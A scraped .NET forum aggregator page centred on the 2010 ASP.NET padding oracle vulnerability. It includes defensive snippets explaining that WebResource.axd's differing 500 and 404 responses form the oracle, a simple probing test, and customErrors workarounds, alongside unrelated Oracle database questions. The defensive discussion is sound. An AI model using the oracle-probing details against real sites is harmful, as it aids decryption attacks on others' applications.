.NET Tutorials, Forums, Interview Questions And Answers
Welcome :Guest
Sign In
Win Surprise Gifts!!!

Top 5 Contributors of the Month
Gaurav Pal
Post New Web Links

Alleged Padding Oracle vulnerability in ASP.NET

Posted By:      Posted Date: September 18, 2010    Points: 0   Category :ASP.Net
Can anybody direct me to an official response from Microsoft to the recently identified, and highly exaggerated and sensationalised, Padding Oracle / AES cookie encryption vulnerability which allegecly affects various platforms including Java, Ruby on Rails, and ASP.NET? http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310 As far as I can tell, this issue is not as serious on any of the affected platforms as the regurgitated suggestions in the hyped articles seem to imply. Data is only compromised if developers are careless enough to . And despite all the headlines mentioning banking and singling-out ASP.NET, websites where security is that important should all be using HTTPS. One highly sensationalised headline and article about this, which only mentioned ASP.NET, has been picked-up and distributed and repeated prolifically. And sensationalist hype is a good way to get people to click on and share a link to your website. However, as fun and trendy as it may be to try and find reasons to criticise Microsoft technology, it is also dangerous and irresponsible when doing so overlooks or neglects to mention other platforms affected by the same type of vulnerability. Nevertheless, it's reassuring to know that potential issues in MS technology are quickly flagged and hard to miss, because they attract so much publicity.

View Complete Post

More Related Resource Links

HOWTO: Verify that custom error handling solutions do not expose padding oracle


I've done some digging and come up with what I think is useful information for you if you have a custom error handling solution in place instead of or as well as the usual ASP.NET <customErrors> stuff.

From comments on ScottGu's post it seem to be that the main suspect to be the actual padding oracle is WebResource.axd (possibly other axd's).

  • If you look in .NET Reflector at the IHttpHandler.ProcessRequest method in  System.Web.Handlers.AssemblyResourceLoader there's a call to Page.DecryptString early on.
  • This is the thing that will cause a HTTP 500 status to be returned if it fails, e.g. if the padding, etc in Request.QueryString["d"] is invalid
  • If the attacker manages to get the padding right, then it continues on, ultimately to call throw new HttpException(404...)

It's this differentiation: is the padding correct (404) or not (500) that is at the root of the exploit: the padding oracle.

If your error handling returns exactly the same response for both - it masks the oracle. To test if you're vulnerable externally, a simple test is to request both:

  • webresource.axd?d=foo
  • webre

Need help implementing the workaround for the oracle padding exploit


Moved from the MVC forum to the dedicated one about the vulnerability one by moderator XIII to keep people and the ASP.NET team at Microsoft focussed on one reporting area:

I'm trying to implement the workaround for the oracle padding exploit described on ScottGu's blog.  Here's the workaround:

<customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="/Home/ErrorPage" />

When I add that to my web.config, I'm not redirected to the error page when I try a bogus URL.  I get the regular 404 error page.  That's not what I expected.  When I visit http://www.example.com/Home/ErrorPage, I can see it just fine.

I can't use the script on Scott's page to test my server since I deploy to Az

Possible fix for oracle padding attack ASP.NET 4.0


I've implemented a possible fix for ASP.NET 4.0 by creating a custom crypto algorithm which uses AES + SHA256 hash.

This way it is not easily possible to create new valid requests. The hash function will sort out the majority of the requests as being invalid. Even if the attacker has the machine key, the attacker also needs the secret hash key to encrypt custom data. 

If someone is interested:


Need Oracle Data Provider .CS File for Oracle 10g Database connection !



I need a 'Wrapper.cs' file which takes care of the Database connection ( Oracle 10g) where

i can just call the method with my SQL Query


Gridview1.DataSource = SampleWrapper.ExecuteDatatable("THE SQL QUERY");


Plz Post the link if there is any open source !    

ASP.Net connect to Oracle.


 We have an application which uses  'System.Data.OracleClient'. On the box it was developed we can change the TNSNAMES.ORA entries to connect to different oracle databases. Moving the code to a  Microsoft Server 2008 box it would appear that the application ignores the TNSNAMES.ORA file. It has cached the first Oracle connection and will now work without any TNSNAMES.ORA file. Where is it getting the connection? We have set tns_admin to point at the TNSNAMES.ORA file. We can tnsping the connection OK.

access Oracle database


Pre- .Net Framework 4.0 supported using Oracle.DataAccess.Client, using Oracle.DataAccess.Types, System.Data.OracleClient, OracleDataReader, OracleConnection. What are the equivalents in .Net Framework 4.0? Does it require any download?

Thank you.

Trying to run a stored procedure from vb code with oracle data provider.



Here is my SP:

create or replace
 Open p_getuserssignon_recordset1 for
 SELECT Distinct(Userid), UserPassword, SecurityLevel, ActiveStatus
WHERE substr(UserId,1,2) <> vUid
Order By UserId;

I would like to run this SP from code and fill a gridview with the result. 

I am not sure how to go about this, as I have found several different examples, other than the one I  think I need.

I am using the oracle data provider and I have an input parameter (vUid, which will equal "zz").

First question. When filling a gridview with a result set from a stored procedure should the recordset OUT be defined as a REFCURSOR (like i did above)? 


Do you have example code as to how to execute the SP and fill a gridview?  I keep trying different variations of code i've found on the internet without any success other than getting more confused.

(I am using VS 2005, VB).

Thank you.



WebResource.axd - Padding is invalid and cannot be removed error



I'm working on a site that is hosted externally, and the admin just sent me an email syaing they're getting this following error:


Event code: 3005 

Event message: An unhandled exception has occurred.

Event time: 11/17/2008 8:11:24 AM

Event time (UTC): 11/17/2008 8:11:24 AM

Event ID: 5d3b54c09a24463ca8fb03f22692e0bb

Event sequence: 731

Event occurrence: 3

Event detail code: 0

Application information:

Application domain: /LM/W3SVC/1776482879/ROOT-1-128713348984007217

Trust level: Full

Application Virtual Path: /

Application Path: D:\....

Machine name: ****

Process information:

Process ID: 2272

Process name: w3wp.exe

Account name: ****

Exception information:

Exception type: CryptographicException

Exception message: Padding is invalid and cannot be removed.

Request information:

Request URL: http://sitename/WebResource.axd?d=_O9D297IUE-qcgMP0yFe-w2&t=633468747532779057

Request path: /WebResource.axd

User host address:


Is authenticated: False

Authentication Type:

Thread ac

Linq with two databases (oracle and sql server)


i have a problem to bring the data from the oracle (external database) and the sql server together (with similar data). The linq entities are linked to each other. The structure is like different countries with different cities and so on. To display these "non original linq objects" i need to put them into entities (linked to each other). Now i add some of them to my sql database. But for every entity i must check the connection to the other objects i don't want to add and delete them (otherwise linq will add all the connected objects, even those I don't want to add). If this goes wrong the whole input-method crashes. Is there any other possibility, except from checking every single entity and removing unwanted connections, to handle this procedure?
Thanks a lot, preg

DataTable --> Oracle DB



Can someone offer advice on the below? 

I am connecting to an AR Server and pulling out data into a DataSet.  There will be 15 different DataTables within the set.  I would like to find a way to either insert the entire DataSet or each DataTable into an Oracle table.  The Oracle table has the same format as the DataTables I'm creating.

 private void button1_Click(object sender, EventArgs e)
                //Get Credentials
                ID = userNameTextBox.Text;
                PW = passWordTextBox.Text;

                connString = gstrConnectBaseLineStart + "UID=" + ID + ";PWD=" + PW + gstrConnectBaseLineEnd; //Connection string
                conn = new OdbcConnection(connString); //Create Connection
                conn.Open(); //Open Connection
                Console.Write("Connection Successful" + "\n");

                dataAdapter = new OdbcDataAdapter(SQL, conn);
                dataAdapter.Fill(IncidentsDataSet, "dataTableTest");

                DataTable dataTable = new DataTable();
                dataTable = IncidentsDataSet.Tables["dataTableTest"];

                dataGridView1.DataSource = dataTable;

                //Would like to create som

Connecting to Oracle on 64bit OS

We have a 64-bit implementation of MOSS 2007. I recently installed the SharePoint SDK to use the Application Definition Designer to connect to Oracle. I enter the connection string and then I get this:

Attempt to load Oracle client libraries threw BadImageFormatException. The problem will occur when running in 64 bit mode with the 32 bit Oracle client components installed.

I have verified that the server contains the 64 bit version of the Oracle client installed both with the instantclient and with system.data.oracleclient.dll. The only thing I can think of is that the tool was compiled as a 32bit application.  Is there a 64bit version available? Is there something else that I'm missing?

"An error occurred while retrieving data from Oracle Instance..."


I have succeffuly Imported the ADF and have also successfully created a Business Data Column. But when I try to query data , I get the following error

An error occurred while retrieving data from Oracle Instance. Administrator, see the server log for more information

And this is what I found in the Application Logs
A Metadata Exception was constructed in App Domain '/LM/W3SVC/81256521/ROOT-1-129217212004078822'. The full exception text is: LobSystem could not be found using criteria 'id=476'.

Secured Oracle Provider



Ours is a Asp.net web application. Database is Oracle. Its an Internet Application.

Database will be in one location and Web application in another. Data from Oracle to Web application will be passed over Internet.

We are using EnterpriseLibrary. And provider is System.Data.OracleClient.

We need a provider which encrypts the data while passing data over internet.

Do we need to go for some third party Providers or ODBC ?

Please let me know..


What's wrong with MSDAORA.1 (Microsoft OLE DB Provider for Oracle) in SQL2008R2

Dear Gurus, I'd install a test SQL2008R2 on Windows Server 2008 R2 x64 Version. And Install Oracle both x86 and x64 version Client. And I'd create a new AS Database as AS System Administrator. And then create a new Datasource with "Microsoft OLE DB Prodiver for Oracle" Provider. When I test connection ,  it tested succeed. Then I create Datasource View / Dimension / Cubes etc... But when I process then Database. There is a error occurs. "Database Access Module Error , Provider 'MSDAORA.1' not register" I'd follow http://msdn.microsoft.com/en-us/library/ms152516.aspx change SQL Server 2008 R2's registry key as the note. Then restart this server . But still same error !   And I'd success process the cube if I change provider as "Oracle OLE DB Proverder"   Is MSDAORA been obsolete in SQL SERVER 2008 R2 ?Wilson

Oracle Linked serve Query performance in 2000 vs 2008 R2 64 Bit

Hi everyone We have started to migrate one of our reporting systems from Sql 2000 to Sql 2008 R2.  One of the steps has been to test the perforance of certain Oracle linked server queries between each server.  We are finding on average 3 fold better perforance stats (in terms of query completion time) on the old server.  This should obviously not be the case.  The new server has signifantly more CPU/Memory/IO resources to play with, and it is 64 bit (not to mention its new!).  Here's what I got so far: Old server: SQL 2000 on W2000 both fully patched.  Old Dell Dual core with 3 GB of Ram running on two soft IDE Mirrored drives (yes I know... it sucks).  It connecting via the MS OLE DB provider for Oracle (9i client) New server: ESX VMware Server with 2 CPU's assigned, 8 GB of ram connected to large HP SAN.  CPU, ram and IO's have all been ruled out as the problem.  We've tried varying network cards with different results so we havent ruled that out yet.  Its connecting via the Oracle provider for OLE DB (11G 64 bit client) The linked server is an Oracle 9i fully patched server.  All three are on the same network backbone. Running a simple select * query on both servers returns the same number of rows (~76 000) .  It takes ~1:20 on the new server and ~0:20 on the old server. In looking at the wait stati

No Way to retrieve data from oracle ref:_cursor over T-SQL and linked Server?

Hello, for an migration projekt we want to compare results from sp's from oracle and sqlsserver. Same calls should retrieve same results. Also we want build an automatic test for this. But is there now way to retrieve results from oracle sp's whit rev_cursor over linked Server? No one answer to this: http://social.msdn.microsoft.com/forums/en-us/sqldataaccess/thread/2BAC6743-8701-4476-8F36-0377A5761525   greetings Michael

I am not able to install oracle 10g on windows 7, Please let me know how can I do it or what could b

Dear Concerned,I have really become fed up while using windows 7, Please let me know how can I install oracle 10g and which of the version of oracle, windows 7  will accept so that I could start work on my laptop ...Thanks and RegardsRahul Kishan
ASP.NetWindows Application  .NET Framework  C#  VB.Net  ADO.Net  
Sql Server  SharePoint  Silverlight  Others  All   

Hall of Fame    Twitter   Terms of Service    Privacy Policy    Contact Us    Archives   Tell A Friend